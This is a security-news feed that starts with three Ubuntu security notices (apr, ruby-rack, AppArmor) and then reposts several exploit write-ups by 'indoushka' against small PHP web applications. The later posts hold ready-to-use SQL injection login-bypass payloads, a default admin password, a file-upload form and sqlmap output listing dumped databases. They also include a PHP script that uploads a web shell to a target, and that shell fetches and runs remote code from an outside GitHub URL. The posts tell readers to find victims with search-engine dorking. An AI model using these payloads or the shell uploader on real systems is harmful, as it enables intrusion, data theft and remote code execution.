Ubuntu Security Notice 7038-1 - Thomas Stangner discovered a permission vulnerability in the Apache Portable Runtime library. A local attacker could possibly use this issue to read named shared memory segments, potentially exposing sensitive application data.

==========================================================================  
Ubuntu Security Notice USN-7038-1  
September 26, 2024

apr vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

The system could be made to expose sensitive information.

Software Description:  
- apr: Apache Portable Runtime Library

Details:

Thomas Stangner discovered a permission vulnerability in the Apache  
Portable Runtime (APR) library. A local attacker could possibly use this  
issue to read named shared memory segments, potentially exposing sensitive  
application data.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libapr1-dev                     1.7.2-3.1ubuntu0.1  
  libapr1t64                      1.7.2-3.1ubuntu0.1

Ubuntu 22.04 LTS  
  libapr1                         1.7.0-8ubuntu0.22.04.2  
  libapr1-dev                     1.7.0-8ubuntu0.22.04.2

Ubuntu 20.04 LTS  
  libapr1                         1.6.5-1ubuntu1.1  
  libapr1-dev                     1.6.5-1ubuntu1.1

Ubuntu 18.04 LTS  
  libapr1                         1.6.3-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro  
  libapr1-dev                     1.6.3-2ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  libapr1                         1.5.2-3ubuntu0.1~esm2  
                                  Available with Ubuntu Pro  
  libapr1-dev                     1.5.2-3ubuntu0.1~esm2  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7038-1  
  CVE-2023-49582

Package Information:  
  https://launchpad.net/ubuntu/+source/apr/1.7.2-3.1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/apr/1.7.0-8ubuntu0.22.04.2  
  https://launchpad.net/ubuntu/+source/apr/1.6.5-1ubuntu1.1

Ubuntu Security Notice USN-7038-1

Ubuntu Security Notice 7036-1 - It was discovered that Rack was not properly parsing data when processing multipart POST requests. If a user or automated system were tricked into sending a specially crafted multipart POST request to an application using Rack, a remote attacker could possibly use this issue to cause a denial of service. It was discovered that Rack was not properly escaping untrusted data when performing logging operations, which could cause shell escaped sequences to be written to a terminal. If a user or automated system were tricked into sending a specially crafted request to an application using Rack, a remote attacker could possibly use this issue to execute arbitrary code in the machine running the application.

    ==========================================================================Ubuntu Security Notice USN-7036-1September 26, 2024ruby-rack vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in Rack.Software Description:- ruby-rack: modular Ruby webserver interfaceDetails:It was discovered that Rack was not properly parsing data when processingmultipart POST requests. If a user or automated system were tricked intosending a specially crafted multipart POST request to an application usingRack, a remote attacker could possibly use this issue to cause a denial ofservice. (CVE-2022-30122)It was discovered that Rack was not properly escaping untrusted data whenperforming logging operations, which could cause shell escaped sequencesto be written to a terminal. If a user or automated system were trickedinto sending a specially crafted request to an application using Rack, aremote attacker could possibly use this issue to execute arbitrary code inthe machine running the application. (CVE-2022-30123)It was discovered that Rack did not properly structure regular expressionsin some of its parsing components, which could result in uncontrolledresource consumption if an application using Rack received speciallycrafted input. A remote attacker could possibly use this issue to cause adenial of service. (CVE-2022-44570, CVE-2022-44571)It was discovered that Rack did not properly structure regular expressionsin its multipart parsing component, which could result in uncontrolledresource consumption if an application using Rack to parse multipart postsreceived specially crafted input. A remote attacker could possibly usethis issue to cause a denial of service. (CVE-2022-44572)It was discovered that Rack incorrectly handled Multipart MIME parsing.A remote attacker could possibly use this issue to cause Rack to consumeresources, leading to a denial of service. (CVE-2023-27530)It was discovered that Rack incorrectly handled certain regularexpressions. A remote attacker could possibly use this issue to causeRack to consume resources, leading to a denial of service.(CVE-2023-27539)It was discovered that Rack incorrectly parsed certain media types. Aremote attacker could possibly use this issue to cause Rack to consumeresources, leading to a denial of service. (CVE-2024-25126)It was discovered that Rack incorrectly handled certain Range headers. Aremote attacker could possibly use this issue to cause Rack to createlarge responses, leading to a denial of service. (CVE-2024-26141)It was discovered that Rack incorrectly handled certain crafted headers. Aremote attacker could possibly use this issue to cause Rack to consumeresources, leading to a denial of service. (CVE-2024-26146)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  ruby-rack                       2.1.4-5ubuntu1.1After a standard system update you need to restart any applications usingRack to make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7036-1  CVE-2022-30122, CVE-2022-30123, CVE-2022-44570, CVE-2022-44571,  CVE-2022-44572, CVE-2023-27530, CVE-2023-27539, CVE-2024-25126,  CVE-2024-26141, CVE-2024-26146, https://bugs.launchpad.net/ubuntu/+source/ruby-rack/+bug/2078711Package Information:  https://launchpad.net/ubuntu/+source/ruby-rack/2.1.4-5ubuntu1.1

Ubuntu Security Notice USN-7036-1

Ubuntu Security Notice 7035-1 - It was discovered that the AppArmor policy compiler incorrectly generated looser restrictions than expected for rules allowing mount operations. A local attacker could possibly use this to bypass AppArmor restrictions in applications where some mount operations were permitted.

==========================================================================  
Ubuntu Security Notice USN-7035-1  
September 25, 2024

apparmor vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

AppArmor restrictions could be bypassed for rules allowing mount  
operations

Software Description:  
- apparmor: Linux security system

Details:

It was discovered that the AppArmor policy compiler incorrectly generated  
looser restrictions than expected for rules allowing mount operations. A  
local attacker could possibly use this to bypass AppArmor restrictions in  
applications where some mount operations were permitted.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  apparmor                        3.0.4-2ubuntu2.4

Ubuntu 20.04 LTS  
  apparmor                        2.13.3-7ubuntu5.4

In general, a standard system update will make all the necessary changes.  
After this update, applications confined by policies with mount operations  
restrictions may need to have the rules updated.

References:  
  https://ubuntu.com/security/notices/USN-7035-1  
  https://bugs.launchpad.net/apparmor/+bug/1597017  
  CVE-2016-1585

Package Information:  
  https://launchpad.net/ubuntu/+source/apparmor/3.0.4-2ubuntu2.4  
  https://launchpad.net/ubuntu/+source/apparmor/2.13.3-7ubuntu5.4

Ubuntu Security Notice USN-7035-1

SchoolPlus version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : SchoolPlus v1.0 Auth By Pass Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

SchoolPlus 1.0 SQL Injection

School Log Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : School Log Management System 1.0 code injection Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/slms/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/slms/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Log Management System 1.0 Code Injection

School Dormitory Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : School Dormitory Management System v1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/user/257130/activity                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clientsGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Dormitory Management System 1.0 Insecure Settings

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

**Sample Blog Site 1.0 SQL Injection**

**Sample Blog Site 1.0 SQL Injection**

Posted Sep 26, 2024

Authored by indoushka

Sample Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection, bypass

SHA-256 | ff00fa017d6b2c496a8bf995f9b728c45edba03e76532f4e55d8dac49f2ca066

Download | Favorite | View

**Sample Blog Site 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : Sample Blog Site 1.0 auth by pass Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-simple-ims.zip                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : ' or 0=0 ##[+] http://127.0.0.1/blog/admin/index.php?page=homeGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Sample Blog Site 1.0 SQL Injection

Rupee Invoice System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Rupee Invoice System v1.0 Remote File Upload Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.mayurik.com/                                                                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : phpinventory/php_action/createProduct.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html>  
<head>  
    <title>Create Product</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/phpinventory/php_action/createProduct.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="currnt_date" value="100">

                <label for="productImage">Product Image:</label>  
        <input type="file" name="productImage" id="productImage" required><br><br>

        <input type="submit" name="create" value="Create">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/phpinventory/assets/myimages/dab.php

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Rupee Invoice System 1.0 Arbitrary File Upload

Restaurant POS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Restaurant POS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin/deletestaff.php?staffID=1[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] ---   GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N   sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:---  Parameter: staffID (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)---[22:32:22] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.30, Apache 2.4.58, PHPback-end DBMS: MySQL >= 5.1 (MariaDB fork)[22:32:22] [INFO] fetching database names[22:32:22] [INFO] starting 7 threads[22:32:22] [INFO] retrieved: 'bangresto'[22:32:22] [INFO] retrieved: 'cms'[22:32:22] [INFO] retrieved: 'phpmyadmin'[22:32:22] [INFO] retrieved: 'mysql'[22:32:22] [INFO] retrieved: 'test'[22:32:22] [INFO] retrieved: 'information_schema'[22:32:22] [INFO] retrieved: 'performance_schema'available databases [7]:[*] bangresto[*] ending @ 22:32:22 /2024-08-16/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Restaurant POS 1.0 SQL Injection

Responsive Binary mlm version 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Responsive Binary mlm 3.2.0 Auth By PAss Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202312/kashipara.com_responsive-binary-mlm-zip.zip   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : u&p = ' or 0=0 ##[+] http://127.0.0.1/responsive_binary_mlm/admin/admin_dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#vulnerability